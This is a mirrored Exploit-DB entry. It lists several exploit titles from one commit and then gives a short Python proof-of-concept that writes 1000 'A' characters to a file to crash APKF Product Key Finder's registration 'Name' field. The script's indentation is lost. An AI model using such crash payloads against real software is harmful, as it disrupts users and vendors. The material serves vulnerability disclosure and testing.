exploit-db-mirror/exploits/windows/dos/47937.py
Offensive Security d907c78cad DB: 2020-01-18
8 changes to exploits/shellcodes

APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)
GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)
Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)
Trend Micro Maximum Security 2019 - Arbitrary Code Execution
Trend Micro Maximum Security 2019 - Privilege Escalation
Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)
Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass
2020-01-18 05:02:08 +00:00

33 lines
No EOL
973 B
Python
Executable file

# Exploit Title: APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)
# Exploit Author: Ismail Tasdelen
# Exploit Date: 2020-01-16
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/apkf_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install APKF Product Key Finder
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.APKF Product Key Finder Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")